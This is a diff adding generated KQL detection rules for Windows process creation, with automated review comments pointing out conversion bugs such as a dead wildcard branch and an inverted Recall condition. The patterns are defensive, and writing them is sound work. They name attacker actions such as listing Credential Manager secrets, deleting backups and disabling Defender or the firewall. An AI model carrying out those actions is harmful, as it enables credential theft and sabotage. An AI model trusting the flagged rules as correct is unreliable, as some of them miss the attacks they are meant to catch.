+| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
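Review bot: The redirection branch `ProcessCommandLine =~ "*whoami*>*"` is dead code: `=~` is case-insensitive equality and `*` is not a wildcard in KQL, so it only matches a command line that is literally the string `*whoami*>*`, and the "redirection options to export the results" case promised in the description is never detected. It looks like an upstream wildcard pattern was emitted verbatim instead of being translated; the branch should read `(ProcessCommandLine contains "whoami" and ProcessCommandLine contains ">")`. Since this is generated output, the wildcard-to-`contains`/`startswith`/`endswith` translation should be fixed in the converter and the other generated rules grepped for `=~ "*`.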
diff --git a/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql
new file mode 100644
index 00000000..6c7054e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql
@@ -0,0 +1,14 @@
+// Title: Windows Backup Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: medium
+// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate backup activity from administration scripts and software.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql
new file mode 100644
index 00000000..9c0ad9c7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql
@@ -0,0 +1,10 @@
+// Title: Windows Credential Manager Access via VaultCmd
+// Author: frack113
+// Date: 2022-04-08
+// Level: medium
+// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql
new file mode 100644
index 00000000..d45f7d5a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql
@@ -0,0 +1,13 @@
+// Title: Windows Default Domain GPO Modification via GPME
+// Author: TropChaud
+// Date: 2025-11-22
+// Level: medium
+// Description: Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).
+// Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+// - Legitimate use of GPME to modify GPOs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "31B2F340-016D-11D2-945F-00C04FB984F9" or ProcessCommandLine contains "6AC1786C-016F-11D2-945F-00C04FB984F9") and (ProcessCommandLine contains "gpme.msc" and ProcessCommandLine contains "gpobject:") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql b/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql
new file mode 100644
index 00000000..62c27b50
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql
@@ -0,0 +1,14 @@
+// Title: Windows Defender Context Menu Removed
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-09
+// Level: high
+// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.
+// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
+// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del" or ProcessCommandLine contains "Remove-Item" or ProcessCommandLine contains "ri ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll", "reg.exe"))) and ProcessCommandLine contains "\\shellex\\ContextMenuHandlers\\EPP"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql b/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql
new file mode 100644
index 00000000..50cef6d8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql
@@ -0,0 +1,10 @@
+// Title: Windows Defender Definition Files Removed
+// Author: frack113
+// Date: 2021-07-07
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql b/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql
new file mode 100644
index 00000000..faaedb7c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Windows Firewall Disabled via PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects attempts to disable the Windows Firewall using PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..83ee6204
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..ee0091cf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-21
+// Level: high
+// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql b/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql
new file mode 100644
index 00000000..6d8929df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql
@@ -0,0 +1,12 @@
+// Title: Windows Kernel Debugger Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required
+
+DeviceProcessEvents
+| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
new file mode 100644
index 00000000..2df2db29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
@@ -0,0 +1,13 @@
+// Title: Windows MSIX Package Support Framework AI_STUBS Execution
+// Author: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-03
+// Level: low
+// Description: Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.
+// This activity may indicate malicious MSIX packages build with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218, attack.t1553.005, attack.t1204.002
+// False Positives:
+// - Legitimate applications packaged with Advanced Installer using Package Support Framework
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AI_STUBS\\AiStubX64Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX64.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86.exe") and ProcessVersionInfoOriginalFileName =~ "popupwrapper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql b/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql
new file mode 100644
index 00000000..dac61897
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql
@@ -0,0 +1,12 @@
+// Title: Windows Processes Suspicious Parent Directory
+// Author: vburov
+// Date: 2019-02-23
+// Level: low
+// Description: Detect suspicious parent processes of well-known Windows processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005
+// False Positives:
+// - Some security products seem to spawn these
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath in~ ("", "-"))) or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql
new file mode 100644
index 00000000..72599a22
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql
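Review bot: The last exclusion in the `| where` line, `InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\"`, is not anchored to the Windows directory and so is wider than the other parent-path exclusions in the same clause, which name a specific binary or vendor folder. Anchoring it keeps the exclusion to the real system directories while staying drive-agnostic, in the `:\\Windows\\Temp\\` style used elsewhere in this diff: `InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"`. If this mirrors the upstream Sigma filter, the tightening belongs in the Sigma source rather than in the generated KQL.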
@@ -0,0 +1,15 @@
+// Title: Windows Recall Feature Enabled Via Reg.EXE
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
+// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate use/activation of Windows Recall
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql
new file mode 100644
index 00000000..b6d8a09b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql
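Review bot: The action selector at the end of the `| where` line, `((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")`, ORs "add" and "0", so any `reg add` touching the DisableAIDataAnalysis value matches, including one that sets it to 1 and therefore disables Recall, which is the opposite of what the title and the "setting it to 0" sentence in the description state. If the upstream Sigma rule requires "add" and "0" together, this is a conversion artifact and the line should read `((ProcessCommandLine contains "add" and ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")`; if upstream really ORs them, the header should say the rule fires on any modification of the value. I cannot tell from the hunk which it is, so it is worth checking how helper.py renders list-valued contains selectors.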
@@ -0,0 +1,14 @@
+// Title: Windows Recovery Environment Disabled Via Reagentc
+// Author: Daniel Koifman (KoifSec), Michael Vilshin
+// Date: 2025-07-31
+// Level: medium
+// Description: Detects attempts to disable windows recovery environment using Reagentc.
+// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
+// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-disable" or ProcessCommandLine contains "/disable" or ProcessCommandLine contains "–disable" or ProcessCommandLine contains "—disable" or ProcessCommandLine contains "―disable") and (FolderPath endswith "\\reagentc.exe" or ProcessVersionInfoOriginalFileName =~ "reagentc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..1baca70e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Windows Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-02
+// Level: low
+// Description: Detects when a share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+// - Legitimate activity by administrators and scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql b/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql
new file mode 100644
index 00000000..f1601036
--- /dev/null
+++ b/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql
@@ -0,0 +1,13 @@
+// Title: Winrar Compressing Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: medium
+// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally
+// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql b/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql
new file mode 100644
index 00000000..53b9ca49
--- /dev/null
+++ b/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql
@@ -0,0 +1,12 @@
+// Title: WinRAR Execution in Non-Standard Folder
+// Author: Florian Roth (Nextron Systems), Tigzy
+// Date: 2021-11-17
+// Level: medium
+// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or (ProcessVersionInfoFileDescription in~ ("Command line RAR", "WinRAR"))) and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/winrs_local_command_execution.kql b/KQL/rules/windows/process_creation/winrs_local_command_execution.kql
new file mode 100644
index 00000000..5db95591
--- /dev/null
+++ b/KQL/rules/windows/process_creation/winrs_local_command_execution.kql
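Review bot: The trailing exclusion `(not(FolderPath contains ":\\Windows\\Temp\\"))` removes WinRAR binaries running out of the Windows temp directory from a rule whose stated purpose is to flag execution outside the default install folder, and nothing in the header explains why that location is trusted. Presumably this is an optional installer-related filter in the upstream Sigma rule; the generated file should say so, for example by adding `// - WinRAR run from \Windows\Temp\ (installer extraction) is excluded by the last filter; remove that filter if the environment does not need it` under `// False Positives:`, so that consumers make a conscious decision about the blind spot rather than inheriting it silently.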
@@ -0,0 +1,13 @@
+// Title: Winrs Local Command Execution
+// Author: Liran Ravich, Nasreddine Bencherchali
+// Date: 2025-10-22
+// Level: high
+// Description: Detects the execution of Winrs.exe where it is used to execute commands locally.
+// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (ProcessCommandLine contains "-r:localhost" or ProcessCommandLine contains "/r:localhost" or ProcessCommandLine contains "–r:localhost" or ProcessCommandLine contains "—r:localhost" or ProcessCommandLine contains "―r:localhost" or ProcessCommandLine contains "-r:127.0.0.1" or ProcessCommandLine contains "/r:127.0.0.1" or ProcessCommandLine contains "–r:127.0.0.1" or ProcessCommandLine contains "—r:127.0.0.1" or ProcessCommandLine contains "―r:127.0.0.1" or ProcessCommandLine contains "-r:[::1]" or ProcessCommandLine contains "/r:[::1]" or ProcessCommandLine contains "–r:[::1]" or ProcessCommandLine contains "—r:[::1]" or ProcessCommandLine contains "―r:[::1]" or ProcessCommandLine contains "-remote:localhost" or ProcessCommandLine contains "/remote:localhost" or ProcessCommandLine contains "–remote:localhost" or ProcessCommandLine contains "—remote:localhost" or ProcessCommandLine contains "―remote:localhost" or ProcessCommandLine contains "-remote:127.0.0.1" or ProcessCommandLine contains "/remote:127.0.0.1" or ProcessCommandLine contains "–remote:127.0.0.1" or ProcessCommandLine contains "—remote:127.0.0.1" or ProcessCommandLine contains "―remote:127.0.0.1" or ProcessCommandLine contains "-remote:[::1]" or ProcessCommandLine contains "/remote:[::1]" or ProcessCommandLine contains "–remote:[::1]" or 
ProcessCommandLine contains "—remote:[::1]" or ProcessCommandLine contains "―remote:[::1]")) or ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (not((ProcessCommandLine contains "-r:" or ProcessCommandLine contains "/r:" or ProcessCommandLine contains "–r:" or ProcessCommandLine contains "—r:" or ProcessCommandLine contains "―r:" or ProcessCommandLine contains "-remote:" or ProcessCommandLine contains "/remote:" or ProcessCommandLine contains "–remote:" or ProcessCommandLine contains "—remote:" or ProcessCommandLine contains "―remote:"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql
new file mode 100644
index 00000000..2b160075
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql
@@ -0,0 +1,11 @@
+// Title: Wlrmdr.EXE Uncommon Argument Or Child Process
+// Author: frack113, manasmbellani
+// Date: 2022-02-16
+// Level: medium
+// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
+// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or (((ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a " or ProcessCommandLine contains "–a " or ProcessCommandLine contains "—a " or ProcessCommandLine contains "―a ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f " or ProcessCommandLine contains "–f " or ProcessCommandLine contains "—f " or ProcessCommandLine contains "―f ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m " or ProcessCommandLine contains "–m " or ProcessCommandLine contains "—m " or ProcessCommandLine contains "―m ") and (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t " or ProcessCommandLine contains "–t " or ProcessCommandLine contains "—t " or ProcessCommandLine contains "―t ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u " or ProcessCommandLine contains "–u " or ProcessCommandLine contains "—u " or ProcessCommandLine contains "―u ") and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or 
isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql
new file mode 100644
index 00000000..d94dee0b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql
@@ -0,0 +1,10 @@
+// Title: WMI Backdoor Exchange Transport Agent
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-11
+// Level: critical
+// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql b/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql
new file mode 100644
index 00000000..7945b485
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql
@@ -0,0 +1,13 @@
+// Title: WMI Persistence - Script Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: medium
+// Description: Detects WMI script event consumers
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+// - Legitimate event consumers
+// - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql b/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql
new file mode 100644
index 00000000..4cf2f286
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: WMIC Remote Command Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC to query information on a remote system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-node:" or ProcessCommandLine contains "/node:" or ProcessCommandLine contains "–node:" or ProcessCommandLine contains "—node:" or ProcessCommandLine contains "―node:") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "localhost" or ProcessCommandLine contains "127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql b/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql
new file mode 100644
index 00000000..e6735784
--- /dev/null
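Review bot: The `| where` line of wmi_persistence_script_event_consumer.kql pins both images with `=~` to absolute paths (`C:\\WINDOWS\\system32\\wbem\\scrcons.exe` and `C:\\Windows\\System32\\svchost.exe`), so the rule is silent on any host whose system root is not C:\Windows; the xwizard rule later in this diff lists "Windows installed on non-C drive" as a false-positive case, and here the same assumption produces a false negative instead. A suffix match keeps the intent without the drive dependency: `| where FolderPath endswith "\\wbem\\scrcons.exe" and InitiatingProcessFolderPath endswith "\\System32\\svchost.exe"`. This probably mirrors the upstream Sigma `Image` values, in which case the loosening belongs in the source rule or in the converter rather than in this generated file.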
+++ b/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql
@@ -0,0 +1,12 @@
+// Title: WmiPrvSE Spawned A Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-15
+// Level: medium
+// Description: Detects WmiPrvSE spawning a process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+// - False positives are expected (e.g. in environments where WinRM is used legitimately)
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql b/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql
new file mode 100644
index 00000000..a65f6e63
--- /dev/null
+++ b/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql
@@ -0,0 +1,11 @@
+// Title: Write Protect For Storage Disabled
+// Author: Sreeman
+// Date: 2021-06-11
+// Level: medium
+// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
+// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
+// MITRE Tactic: Defense Evasion
